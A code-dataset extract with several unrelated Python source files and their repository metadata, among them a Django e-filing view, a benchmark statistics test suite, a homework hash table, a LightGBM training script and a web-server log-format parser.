draw.rectangle([0, 0, 15, 8], outline=colour)
# This one is always white because it's the 30m separator.
draw.line([1,4,14,4], colours['white'])
for x in range(3, 15, 3):
draw.line([x,1,x,7], colour)
def main():
args = parse_args(sys.argv[1:])
if args.time < 200:
print('error: --time values <200ms are not supported.\n'
'Uploading a frame takes ~180ms...')
sys.exit(1)
bl = blinken.Blinken(
gamma=args.gamma,
debug=args.verbose,
dev=args.device,
speed=args.speed)
if args.reset:
bl.command('RST')
# Render a splash screen to ensure there's always
# one animation in the queue as our "framebuffer"
# and cause people seizures as we fetch calendar data ;-)
splash(bl)
clk = clock.Clock(10)
cal = Cal(args.calendar)
frame = 0
start = time.clock_gettime(time.CLOCK_MONOTONIC)
while True:
now = arrow.now()
buf = Image.new(mode='RGB', size=(16, 16))
draw = ImageDraw.Draw(buf)
cal.Draw(draw, now)
clk.Draw(draw)
with bl.animation(1100, start_next=True) as anim:
anim.frame_from_image(buf, 1100)
# Keep calendar updates in the dead time between frame draws.
# Update for *next* second because that's when it'll be rendered.
# TODO: put it on a separate thread, fetching and parsing 500kb
# of ICS data with raw python is multiple-seconds slow and will
# cause a noticeable period of blank screen.
cal.UpdateBoxes(now.shift(seconds=1))
frame += 1
frametime = (start + ((args.time/1000)*frame)) - time.clock_gettime(time.CLOCK_MONOTONIC)
if frametime < 0:
print('Negative frame time, things are taking too long :-O')
continue
time.sleep(frametime)
if __name__ == '__main__':
main()
| 34.971831 | 97 | 0.592429 | 1,312 | 9,932 | 4.398628 | 0.297256 | 0.027725 | 0.02062 | 0.014556 | 0.106221 | 0.065846 | 0.015942 | 0.015942 | 0.015942 | 0.015942 | 0 | 0.026715 | 0.283931 | 9,932 | 283 | 98 | 35.095406 | 0.78473 | 0.197644 | 0 | 0.085 | 0 | 0 | 0.130566 | 0.003785 | 0 | 0 | 0 | 0.003534 | 0 | 1 | 0.09 | false | 0 | 0.05 | 0.025 | 0.205 | 0.025 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3749d562b21ac17eff7db98c573f8f834fbad3b1 | 6,455 | py | Python | edivorce/apps/core/views/efiling.py | seeker25/eDivorce | e0c56424f97a30b74930b35d774c30d7be25b5a1 | [
"Apache-2.0"
] | null | null | null | edivorce/apps/core/views/efiling.py | seeker25/eDivorce | e0c56424f97a30b74930b35d774c30d7be25b5a1 | [
"Apache-2.0"
] | null | null | null | edivorce/apps/core/views/efiling.py | seeker25/eDivorce | e0c56424f97a30b74930b35d774c30d7be25b5a1 | [
"Apache-2.0"
] | null | null | null | import base64
import random
import re
from django.conf import settings
from django.contrib import messages
from django.shortcuts import redirect
from django.urls import reverse
from django.contrib.auth.decorators import login_required
from ..decorators import prequal_completed
from ..models import Document, UserResponse
from ..utils.efiling_documents import forms_to_file
from ..utils.efiling_packaging import EFilingPackaging
from ..utils.efiling_submission import EFilingSubmission
from ..utils.user_response import get_data_for_user
MAX_MEGABYTES = 10
@login_required
@prequal_completed
def submit_initial_files(request):
return _submit_files(request, initial=True)
@login_required
@prequal_completed
def submit_final_files(request):
return _submit_files(request, initial=False)
def _submit_files(request, initial=False):
""" App flow logic """
responses_dict = get_data_for_user(request.user)
errors, hub_redirect_url = _validate_and_submit_documents(
request, responses_dict, initial=initial)
if hub_redirect_url:
return redirect(hub_redirect_url)
if initial:
original_step = 'initial_filing'
next_page = 'wait_for_number'
else:
original_step = 'final_filing'
next_page = 'next_steps'
if errors:
next_page = original_step
if not isinstance(errors, list):
errors = [errors]
for error in errors:
messages.add_message(request, messages.ERROR, error)
responses_dict['active_page'] = next_page
return redirect(reverse('dashboard_nav', kwargs={'nav_step': next_page}), context=responses_dict)
def _validate_and_submit_documents(request, responses, initial=False):
""" Validation and submission logic """
user = request.user
errors = []
if not initial:
user_has_submitted_initial = responses.get('initial_filing_submitted') == 'True'
if not user_has_submitted_initial:
errors.append(
"You must file the initial filing first before submitting the final filing.")
court_file_number = responses.get('court_file_number')
if not court_file_number:
errors.append("You must input your Court File Number")
elif not re.search("^[0-9]{4,10}$", court_file_number):
errors.append("A Court File Number contains only digits and must be between 4 and 10 digits in length")
uploaded, generated = forms_to_file(responses, initial)
for form in uploaded:
if form['doc_type'] not in ['EFSS1', 'AFTL']:
total_size = 0
docs = Document.objects.filter(
bceid_user=user, doc_type=form['doc_type'], party_code=form.get('party_code', 0))
if docs.count() == 0:
errors.append(f"Missing documents for {Document.form_types[form['doc_type']]}")
for doc in docs:
total_size += doc.size
if total_size > MAX_MEGABYTES * 1024 * 1024:
errors.append(
f"{Document.form_types[form['doc_type']]} exceeds the { MAX_MEGABYTES } MB size limit")
if errors:
return errors, None
if not settings.EFILING_HUB_ENABLED:
redirect = _after_submit_files(request, initial)
return None, redirect.url
msg, redirect_url = _package_and_submit(request, uploaded, generated, responses, initial)
if redirect_url:
return None, redirect_url
if msg != 'success':
errors.append(msg)
return errors, None
return None, None
def _package_and_submit(request, uploaded, generated, responses, initial):
""" Build the efiling package and submit it to the efiling hub """
packaging = EFilingPackaging(initial)
hub = EFilingSubmission(initial, packaging)
post_files, documents = packaging.get_files(request, responses, uploaded, generated)
redirect_url, msg = hub.upload(request, responses, post_files, documents)
return msg, redirect_url
@login_required
@prequal_completed
def after_submit_initial_files(request):
return _after_submit_files(request, initial=True)
@login_required
@prequal_completed
def after_submit_final_files(request):
return _after_submit_files(request, initial=False)
def _after_submit_files(request, initial=False):
responses_dict = get_data_for_user(request.user)
if initial:
next_page = 'wait_for_number'
else:
next_page = 'next_steps'
user = request.user
prefix = 'initial' if initial else 'final'
_save_response(user, f'{prefix}_filing_submitted', 'True')
if not initial:
_save_response(user, 'final_filing_status', 'Submitted')
package_number = _get_package_number(request)
_save_response(user, f'{prefix}_filing_package_number', package_number)
if settings.DEPLOYMENT_TYPE == 'localdev':
base_url = 'https://dev.justice.gov.bc.ca'
else:
base_url = settings.PROXY_BASE_URL
# purge the attachments
Document.objects.filter(
bceid_user=user,
filing_type=('i' if initial else 'f')
).delete()
receipt_link = base_url + '/cso/filing/status/viewDocument.do?actionType=viewReceipt&packageNo=' + package_number
_save_response(user, f'{prefix}_filing_receipt_link', receipt_link)
package_link = base_url + '/cso/accounts/bceidNotification.do?packageNo=' + package_number
_save_response(user, f'{prefix}_filing_package_link', package_link)
responses_dict['active_page'] = next_page
return redirect(reverse('dashboard_nav', kwargs={'nav_step': next_page}), context=responses_dict)
def _get_package_number(request):
if settings.EFILING_HUB_ENABLED:
base64_message = request.GET.get('packageRef', '')
base64_bytes = base64_message.encode('ascii')
message_bytes = base64.b64decode(base64_bytes)
message = message_bytes.decode('ascii')
parts = message.split('=')
if len(parts) == 2:
return parts[1]
# Generate a random string in format 000-000-000
package_number_parts = []
for _ in range(3):
num = ''
for _ in range(3):
num += str(random.randint(0, 9))
package_number_parts.append(num)
return '-'.join(package_number_parts)
def _save_response(user, question, value):
response, _ = UserResponse.objects.get_or_create(bceid_user=user, question_id=question)
response.value = value
response.save()
| 32.933673 | 117 | 0.698993 | 808 | 6,455 | 5.311881 | 0.238861 | 0.033551 | 0.029357 | 0.040774 | 0.337139 | 0.288677 | 0.199674 | 0.162861 | 0.102516 | 0.078751 | 0 | 0.009977 | 0.208056 | 6,455 | 195 | 118 | 33.102564 | 0.829617 | 0.027576 | 0 | 0.246479 | 0 | 0 | 0.145437 | 0.052102 | 0 | 0 | 0 | 0 | 0 | 1 | 0.070423 | false | 0 | 0.098592 | 0.028169 | 0.274648 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
374dd8193ca54427fd3b47ebd2fa213180ba8a3d | 796 | py | Python | pyasn1_modules/rfc3537.py | alvistack/etingof-pyasn1-modules | bdbcc5d9650a8e8382979f089df3307dd4121b49 | [
"BSD-2-Clause"
] | 34 | 2016-04-03T09:10:31.000Z | 2022-02-12T20:38:31.000Z | pyasn1_modules/rfc3537.py | alvistack/etingof-pyasn1-modules | bdbcc5d9650a8e8382979f089df3307dd4121b49 | [
"BSD-2-Clause"
] | 138 | 2017-05-31T09:25:10.000Z | 2022-02-07T09:00:19.000Z | pyasn1_modules/rfc3537.py | alvistack/etingof-pyasn1-modules | bdbcc5d9650a8e8382979f089df3307dd4121b49 | [
"BSD-2-Clause"
] | 36 | 2016-03-16T00:37:04.000Z | 2021-11-12T12:09:43.000Z | #
# This file is part of pyasn1-modules software.
#
# Created by Russ Housley.
#
# Copyright (c) 2019, Vigil Security, LLC
# License: http://snmplabs.com/pyasn1/license.html
#
# SEED Encryption Algorithm in CMS
#
# ASN.1 source from:
# https://www.rfc-editor.org/rfc/rfc4010.txt
#
from pyasn1.type import constraint
from pyasn1.type import univ
from pyasn1_modules import rfc5280
id_alg_HMACwith3DESwrap = univ.ObjectIdentifier('1.2.840.113549.1.9.16.3.11')
id_alg_HMACwithAESwrap = univ.ObjectIdentifier('1.2.840.113549.1.9.16.3.12')
# Update the Algorithm Identifier map in rfc5280.py.
_algorithmIdentifierMapUpdate = {
id_alg_HMACwith3DESwrap: univ.Null(""),
id_alg_HMACwithAESwrap: univ.Null(""),
}
rfc5280.algorithmIdentifierMap.update(_algorithmIdentifierMapUpdate)
| 22.742857 | 77 | 0.757538 | 108 | 796 | 5.481481 | 0.601852 | 0.033784 | 0.047297 | 0.067568 | 0.121622 | 0.121622 | 0.121622 | 0.121622 | 0.121622 | 0.121622 | 0 | 0.091954 | 0.125628 | 796 | 34 | 78 | 23.411765 | 0.758621 | 0.383166 | 0 | 0 | 0 | 0 | 0.109244 | 0.109244 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.3 | 0 | 0.3 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
374f3b7ef3585b1770c1ec627dee8e6fd5b66ec8 | 6,195 | py | Python | pylibs/benchmarking/tests/test_run_bench/test_benchmark_driver.py | famousyub/smartyphp | 2691233a8993b8902c6a3d533a6e3f1fe44fe0f8 | [
"MIT"
] | 359 | 2018-06-16T02:42:54.000Z | 2022-03-21T06:39:26.000Z | pylibs/benchmarking/tests/test_run_bench/test_benchmark_driver.py | famousyub/smartyphp | 2691233a8993b8902c6a3d533a6e3f1fe44fe0f8 | [
"MIT"
] | 257 | 2018-07-03T22:08:27.000Z | 2022-03-31T18:45:04.000Z | pylibs/benchmarking/tests/test_run_bench/test_benchmark_driver.py | famousyub/smartyphp | 2691233a8993b8902c6a3d533a6e3f1fe44fe0f8 | [
"MIT"
] | 77 | 2018-06-16T04:00:29.000Z | 2022-02-19T03:07:58.000Z | #!/usr/bin/env python
##############################################################################
# Copyright 2017-present, Facebook, Inc.
# All rights reserved.
#
# This source code is licensed under the license found in the
# LICENSE file in the root directory of this source tree.
##############################################################################
# import os
# import sys
import unittest
import driver.benchmark_driver as bd
class BenchmarkDriverUnitTest(unittest.TestCase):
def setUp(self):
return
log_prefix = "ERROR:GlobalLogger:"
array1 = [0.0, 1.0, 2.0, 3.0, 4.0]
array2 = [4.0, 3.0, 2.0, 1.0, 0.0]
array_with_zero_mean = [-2.0, -1.0, 0.0, 1.0, 2.0]
expected1 = {
"mean": 2.0,
"p0": 0.0,
"p10": 0.4,
"p50": 2.0,
"p90": 3.6,
"p100": 4.0,
"stdev": 1.4142135623730951,
"MAD": 1.0,
"cv": 0.7071067811865476,
}
expected2 = {
"mean": 2.0,
"p0": 0.0,
"p10": 0.4,
"p50": 2.0,
"p90": 3.6,
"p100": 4.0,
"stdev": 1.4142135623730951,
"MAD": 1.0,
"cv": 0.7071067811865476,
}
result_with_cv_none = {
"mean": 0.0,
"p0": -2.0,
"p10": -1.6,
"p50": 0.0,
"p90": 1.6,
"p100": 2.0,
"stdev": 1.4142135623730951,
"MAD": 1.0,
"cv": None,
}
def test_getStatistics1(self):
self.assertEqual(bd._getStatistics(self.array1), self.expected1)
def test_getStatistics2(self):
self.assertEqual(bd._getStatistics(self.array2), self.expected2)
def test_getStatistics_with_zero_mean(self):
self.assertEqual(
bd._getStatistics(self.array_with_zero_mean), self.result_with_cv_none
)
def test_getStatistics_custom_valid(self):
stats = ["p10", "p90", "p50", "p95", "p5", "p11"]
expected = {
"p10": 0.4,
"p11": 0.44,
"p5": 0.2,
"p50": 2.0,
"p90": 3.6,
"p95": 3.8,
}
self.assertEqual(bd._getStatistics(self.array1, stats), expected)
def test_getStatistics_custom_missing_p50(self):
stats = ["p10", "p90", "p95", "p5", "p11"]
expected = {
"p10": 0.4,
"p11": 0.44,
"p5": 0.2,
"p90": 3.6,
"p95": 3.8,
"p50": 2.0,
}
self.assertEqual(bd._getStatistics(self.array1, stats), expected)
def test_getStatistics_custom_padf(self):
stats = ["padf"]
with self.assertLogs(level="ERROR") as log:
self.assertRaises(AssertionError, bd._getStatistics, self.array1, stats)
self.assertIn(
self.log_prefix
+ "Unsupported custom statistic '{}' ignored.".format(stats[0]),
log.output,
)
def test_getStatistics_custom_p(self):
stats = ["p"]
with self.assertLogs(level="ERROR") as log:
self.assertRaises(AssertionError, bd._getStatistics, self.array1, stats)
self.assertIn(
self.log_prefix
+ "Unsupported custom statistic '{}' ignored.".format(stats[0]),
log.output,
)
def test_createDiffOfDelay1(self):
expectedDiff = {
"mean": 0.0,
"p0": -4.0,
"p10": -3.2,
"p50": 0.0,
"p90": 3.2,
"p100": 4.0,
"stdev": 0.0,
"MAD": 0.0,
"cv": 0.0,
}
self.assertEqual(
bd._createDiffOfDelay(self.expected1, self.expected1), expectedDiff
)
def test_createDiffOfDelay_None1(self):
expectedDiff = {
"mean": 2.0,
"p0": -2.0,
"p10": -1.2,
"p50": 2.0,
"p90": 5.2,
"p100": 6.0,
"stdev": 0.0,
"MAD": 0.0,
}
self.assertEqual(
bd._createDiffOfDelay(self.result_with_cv_none, self.expected1),
expectedDiff,
)
def test_createDiffOfDelay_None2(self):
expectedDiff = {
"mean": -2.0,
"p0": -6.0,
"p10": -5.2,
"p50": -2.0,
"p90": 1.2,
"p100": 2.0,
"stdev": 0.0,
"MAD": 0.0,
}
self.assertEqual(
bd._createDiffOfDelay(self.expected1, self.result_with_cv_none),
expectedDiff,
)
def test_getPercentile_EmptyError(self):
percentile = 50
self.assertRaises(AssertionError, bd._getPercentile, [], percentile)
def test_getPercentile_HighError(self):
percentile = 106.1
self.assertRaises(AssertionError, bd._getPercentile, self.array1, percentile)
def test_getPercentile_LowError(self):
percentile = -1
self.assertRaises(AssertionError, bd._getPercentile, self.array1, percentile)
def test_percentileArgVal_invalid(self):
self.assertEqual(bd._percentileArgVal("padf"), None)
self.assertEqual(bd._percentileArgVal("p101.6"), None)
self.assertEqual(bd._percentileArgVal("p-1"), None)
self.assertEqual(bd._percentileArgVal("p"), None)
def test_percentileArgVal_float(self):
self.assertEqual(bd._percentileArgVal("p99.9"), 99.9)
self.assertEqual(bd._percentileArgVal("p66.6"), 66.6)
def test_getStatisticsSet_default(self):
expected = ["mean", "p0", "p10", "p50", "p90", "p100", "stdev", "MAD", "cv"]
self.assertEqual(bd._default_statistics, expected)
self.assertEqual(bd._getStatisticsSet(None), expected)
self.assertEqual(bd._getStatisticsSet([]), expected)
def test_getStatisticsSet_fromTest(self):
expected = ["p10", "p90", "p50"]
self.assertEqual(bd._getStatisticsSet({"statistics": expected}), expected)
def test_getStatisticsSet_p50iMssing(self):
input = ["p10", "p90"]
expected = ["p10", "p90", "p50"]
self.assertEqual(bd._getStatisticsSet({"statistics": input}), expected)
if __name__ == "__main__":
unittest.main()
| 28.548387 | 85 | 0.528168 | 671 | 6,195 | 4.734724 | 0.193741 | 0.089707 | 0.101668 | 0.062323 | 0.603399 | 0.506453 | 0.380548 | 0.376456 | 0.367013 | 0.308467 | 0 | 0.097209 | 0.305892 | 6,195 | 216 | 86 | 28.680556 | 0.641628 | 0.035028 | 0 | 0.46988 | 0 | 0 | 0.078775 | 0 | 0 | 0 | 0 | 0 | 0.168675 | 1 | 0.114458 | false | 0 | 0.012048 | 0.006024 | 0.180723 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
3752450480eea1c7e55ce4fc9b56d64c75873411 | 4,604 | py | Python | ADT/Homework 9/HashTables/HashTable.py | Devang-25/CS-Jacobs | d56a70c13ce3863bcf3140990fab5b634b30a2af | [
"MIT"
] | null | null | null | ADT/Homework 9/HashTables/HashTable.py | Devang-25/CS-Jacobs | d56a70c13ce3863bcf3140990fab5b634b30a2af | [
"MIT"
] | null | null | null | ADT/Homework 9/HashTables/HashTable.py | Devang-25/CS-Jacobs | d56a70c13ce3863bcf3140990fab5b634b30a2af | [
"MIT"
] | null | null | null | class Node:
# Defining a Node
def __init__(self, key=None, value=None):
"""A Node Class
Keyword Arguments:
key {int} -- The unique key for a Node (default: {None})
value {int} -- The data for the the Node (default: {None})
"""
self.key = key
self.value = value
class HashTable:
"""
This is a class for HashTable that generates HashCode for different keys and
stored the values.
Attributes:
maxsize (int) : The max number of elements in the HashTable
currentsize (int): The number of current elements in the Hash Table
"""
def __init__(self):
self.maxsize = 100
self.currentsize = 0
self.arr = [None]*self.maxsize
# Hashing function
def hashCode(self, key):
""" This function generates a hashcode
Arguments:
key {integer} -- The key for generating the hashcode
Returns:
integer -- Returns the hashcode for the particular given key
"""
# The hash function here is the python based hash-function
# I felt no need to change the hash function as it is working fine
return hash(key) % self.maxsize
# Insert a Value with help of hashing
def insertNode(self, key, value):
""" This method Inserts a Value with help of hashing and checks for collision
and if it collides follows a linear probing.
Arguments:
key {integer} -- This is the key for generating the hashcode
value {integer} -- This is the value that is going to be inserted in the
hashtable as a Node
"""
if self.arr[self.hashCode(key)] is None:
# If the cell is Empty
self.arr[self.hashCode(key)] = Node(key, value)
else:
# Collision found
status = False
HashCode = self.hashCode(key)
while self.arr[HashCode] is not None:
# If the adjecent cell of the hash table is occupied
HashCode = (HashCode + 1)
# if the increment exceeds the max size of the hash table
if HashCode >= self.maxsize and status == True:
raise Exception('\n ------ | OverFlow of Data |--------- ')
elif (HashCode >= self.maxsize):
HashCode = HashCode % self.maxsize
status = True
self.arr[HashCode] = Node(key, value)
# Incrementing the current size of the elements in the hash table
self.currentsize = self.currentsize+1
# Get the value at the key
def get(self, key):
""" Retrive the value at the postion of the key.
Arguments:
key {integer} -- The key for the generating the hashCode to retrieve value
Returns:
{integer} -- The actual value that is stored at the hashcode of key
"""
HashCode = self.hashCode(key)
if self.arr[HashCode] is None:
return None
else:
while self.arr[HashCode].key != key:
HashCode = HashCode+1
if HashCode >= self.maxsize:
HashCode = HashCode % self.maxsize
elif self.arr[HashCode] is None:
# If the array's position with Hash Codes is empty
# It ensures that the item with that Hash code is missing
return None
elif HashCode == self.hashCode(key):
# If the Hash Codes takes one round searching for the key
return None
return self.arr[HashCode].value
# Method to find if the hash table is empty
def isEmpty(self):
""" Checks if the HashTable is empty
Returns:
bool -- Returns false if the hashTable is empty
"""
return self.currentsize == 0
if __name__ == "__main__":
mytable = HashTable()
""" Inserting Values in the table with keys """
mytable.insertNode(1, 1)
mytable.insertNode(11, 2)
mytable.insertNode(101, 3)
mytable.insertNode(102, 4)
mytable.insertNode(111, 5)
mytable.insertNode(1001, 6)
mytable.insertNode(1011, 7)
"""
Getting a vlaue for a particular key
"""
print("\nChecking for the values for keys in Hash Table:\n")
print('The value for key 1 is : {}'.format(mytable.get(1)))
print('The value for key 101 is : {}'.format(mytable.get(101)))
print('The value for key 111 is : {}'.format(mytable.get(111)))
| 32.885714 | 86 | 0.572546 | 573 | 4,604 | 4.572426 | 0.249564 | 0.024046 | 0.034351 | 0.026336 | 0.2 | 0.093511 | 0.035115 | 0 | 0 | 0 | 0 | 0.016279 | 0.346221 | 4,604 | 139 | 87 | 33.122302 | 0.854153 | 0.399001 | 0 | 0.163636 | 0 | 0 | 0.076699 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.109091 | false | 0 | 0 | 0 | 0.254545 | 0.072727 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
375570af4f92c8f4e216e1ebc0166477badfeb09 | 1,213 | py | Python | chapter11/step02/train_model.py | UserAdminD3us/Microsoft-Certified-Azure-Data-Scientist-Associate-Certification-Guide | 62873b5a99120d240a8df8c0b7f81e6c95d5be02 | [
"MIT"
] | null | null | null | chapter11/step02/train_model.py | UserAdminD3us/Microsoft-Certified-Azure-Data-Scientist-Associate-Certification-Guide | 62873b5a99120d240a8df8c0b7f81e6c95d5be02 | [
"MIT"
] | null | null | null | chapter11/step02/train_model.py | UserAdminD3us/Microsoft-Certified-Azure-Data-Scientist-Associate-Certification-Guide | 62873b5a99120d240a8df8c0b7f81e6c95d5be02 | [
"MIT"
] | null | null | null | import argparse
import os
import lightgbm as lgb
import joblib
parser = argparse.ArgumentParser()
parser.add_argument(
"--learning-rate",
type=float,
dest="learning_rate",
help="Learning date for LightGBM",
default=0.01,
)
parser.add_argument(
"--input-path",
type=str,
dest="input_path",
help="Directory containing the datasets",
default="../data",
)
parser.add_argument(
"--output-path",
type=str,
dest="output_path",
help="directory to store model",
default="./model",
)
args = parser.parse_args()
print(f"Loading data from {args.input_path}")
train_data = lgb.Dataset(os.path.join(args.input_path, "train_dataset.bin"))
validation_data = lgb.Dataset(os.path.join(args.input_path, "validation_dataset.bin"))
param = {
"task": "train",
"objective": "binary",
"metric": "auc",
"num_leaves": 5,
"learning_rate": args.learning_rate,
}
model = lgb.train(
param,
train_set=train_data,
valid_sets=validation_data,
early_stopping_rounds=5,
)
output_path = args.output_path
if not os.path.exists(output_path):
os.makedirs(output_path)
joblib.dump(value=model, filename=os.path.join(output_path, "model.joblib"))
| 22.054545 | 86 | 0.690025 | 162 | 1,213 | 4.993827 | 0.41358 | 0.086527 | 0.063041 | 0.037083 | 0.091471 | 0.091471 | 0.091471 | 0.091471 | 0.091471 | 0 | 0 | 0.004921 | 0.162407 | 1,213 | 54 | 87 | 22.462963 | 0.791339 | 0 | 0 | 0.106383 | 0 | 0 | 0.258038 | 0.018137 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.085106 | 0 | 0.085106 | 0.021277 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37567441cec8df2625f386786c43826f9d7358ea | 6,446 | py | Python | log_parser/__init__.py | kozlovzxc/python-log-parser | a7b5c2b489e7cece437dfc36746ff58399646fd0 | [
"MIT"
] | null | null | null | log_parser/__init__.py | kozlovzxc/python-log-parser | a7b5c2b489e7cece437dfc36746ff58399646fd0 | [
"MIT"
] | null | null | null | log_parser/__init__.py | kozlovzxc/python-log-parser | a7b5c2b489e7cece437dfc36746ff58399646fd0 | [
"MIT"
] | null | null | null | from pyparsing import *
from string import printable, uppercase
from dateutil import parser as dateutil_parser
import yaml
class LogParser(object):
ACCESS_LOG_VARS = {
'request.first_line' : Word(uppercase)('request.method')+\
Literal(" ")+\
SkipTo(" ")('request.uri')+\
Literal(" ")+\
Combine("HTTP/"+\
Word(nums+'.', exact=3))('request.protocol'),
#'request.time' : Word(alphanums+' /:+-').setParseAction(lambda s,l,t : dateutil_parser.parse(t[0].replace(':', ' ', 1)) )
}
def translate_nginx_varname(self, chunk):
name = chunk['var_name']
if name in self.NGINX_TO_INTERNAL:
return self.NGINX_TO_INTERNAL[name]
elif name.startswith('http_'):
return 'request.headers.'+name[5:].replace('_', '-')
elif name.startswith('sent_http_'):
return 'response.headers.'+name[10:].replace('_', '-')
elif name.startswith('request_'):
# body, body_file, id, completion, length, method, uri
return 'request.'+name[8:]
elif name.startswith('cookie_'):
return 'request.headers.cookies.'+name[7:].replace('_', '-')
elif name.startswith('arg_'):
return 'request.args.'+name[4:]
elif name.startswith('tcpinfo_'):
# rtt, rttvar, snd_cwnd, rcv_space
return 'tcpinfo.'+name[8:]
else:
return name
def translate_apache_varname(self, chunk):
name = chunk['var_name']
if 'option' in chunk:
option = chunk['option']
if name == 'a':
if option == 'c':
return 'request.proxy.src_ip'
else:
raise KeyError('Unknown Key: {0}'.format(option))
elif name =='p':
if option == 'canonical':
return '' #???
elif option == 'local':
return 'request.dst_port'
elif option == 'remote':
return 'request.src_port'
elif name == 'C':
return 'request.headers.cookies.'+option.lower()
elif name == 'e':
return 'server.enviroment.'+option.lower()
elif name == 'i':
return 'request.headers.'+option.lower()
elif name == 'o':
return 'response.headers.'+option.lower()
elif name == 'P':
return 'server.worker.'+option.lower()
elif name == 't':
return 'request.{0}_time'.format(option.lower())
elif name == 'T':
return 'request.{0}_time_consume'.format(option.lower())
else:
return name
else:
return self.APACHE_TO_INTERNAL[name]
def __init__(self, log_format, log_type='nginx'):
with open('log_parser/nginx_translation.yml','r') as nginx_translation:
self.NGINX_TO_INTERNAL = yaml.load(nginx_translation)
with open('log_parser/apache_translation.yml', 'r') as apache_translation:
self.APACHE_TO_INTERNAL = yaml.load(apache_translation)
self.default_white_chars = ParserElement.DEFAULT_WHITE_CHARS
ParserElement.setDefaultWhitespaceChars('')
settings = {
'nginx':{
'variable': Group(Suppress('$')+ Word(alphanums+'_')('var_name')),
'literal': Word(printable, excludeChars='$'),
'translation': self.translate_nginx_varname,
},
'apache':{
'variable': Group(Suppress(\
'%'+\
Optional(\
Literal('!')\
)+\
Optional(\
Word(nums)+\
ZeroOrMore(\
','+\
Word(nums)\
)\
)+\
Optional(\
Word('<>', exact=1)\
)\
)+\
Optional(Suppress('{')+\
Word(alphas+'-')('option')+\
Suppress('}')\
)+\
Word(alphas, min=1, max=2)('var_name')),
'literal': Word(printable, excludeChars='%'),
'translation': self.translate_apache_varname,
},
'default':{
'variable': Group('${'+ Word(alphanums+'_')('var_name')+'}'),
'literal': Word(printable, excludeChars='${}'),
'translation': lambda token: token[2:-1]
},
}
log_type_settings = settings.get(log_type, 'default')
variable = log_type_settings['variable']
literal = log_type_settings['literal']
translation = log_type_settings['translation']
log_format_parser = ZeroOrMore(variable|literal)
log_format_tokens = log_format_parser.parseString(log_format)
self.parser = Empty()
for i in xrange(0, len(log_format_tokens)):
chunk = log_format_tokens[i]
if isinstance(chunk, str):
append = Literal(chunk)
else:
var_name = translation(chunk)
if var_name in self.ACCESS_LOG_VARS:
append = self.ACCESS_LOG_VARS[var_name]
else:
if i + 1 < len(log_format_tokens):
append = SkipTo(log_format_tokens[i+1])
else:
append = SkipTo(LineEnd())
append = append.setResultsName(var_name)
self.parser += append
ParserElement.setDefaultWhitespaceChars(self.default_white_chars)
def _make_dict(self, parsed):
return {key:(''.join(val._asStringList()) if isinstance(val, ParseResults) else val) for key,val in parsed.items()}
def parse(self, record):
return self._make_dict(self.parser.parseString(record))
| 42.973333 | 134 | 0.477195 | 564 | 6,446 | 5.265957 | 0.271277 | 0.03771 | 0.036364 | 0.038384 | 0.134007 | 0.116498 | 0.116498 | 0.116498 | 0.093603 | 0 | 0 | 0.005415 | 0.398387 | 6,446 | 149 | 135 | 43.261745 | 0.760444 | 0.032578 | 0 | 0.161765 | 0 | 0 | 0.113465 | 0.021987 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036765 | false | 0 | 0.029412 | 0.014706 | 0.25 | 0.029412 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
37578518bee7829df262610a24f622d6d408232d | 12,196 | py | Python | python/biograph/vdb/parquet_test.py | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 16 | 2021-07-14T23:32:31.000Z | 2022-03-24T16:25:15.000Z | python/biograph/vdb/parquet_test.py | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 9 | 2021-07-20T20:39:47.000Z | 2021-09-16T20:57:59.000Z | python/biograph/vdb/parquet_test.py | spiralgenetics/biograph | 33c78278ce673e885f38435384f9578bfbf9cdb8 | [
"BSD-2-Clause"
] | 9 | 2021-07-15T19:38:35.000Z | 2022-01-31T19:24:56.000Z | # pylint: disable=missing-docstring
import unittest
import gzip
import tempfile
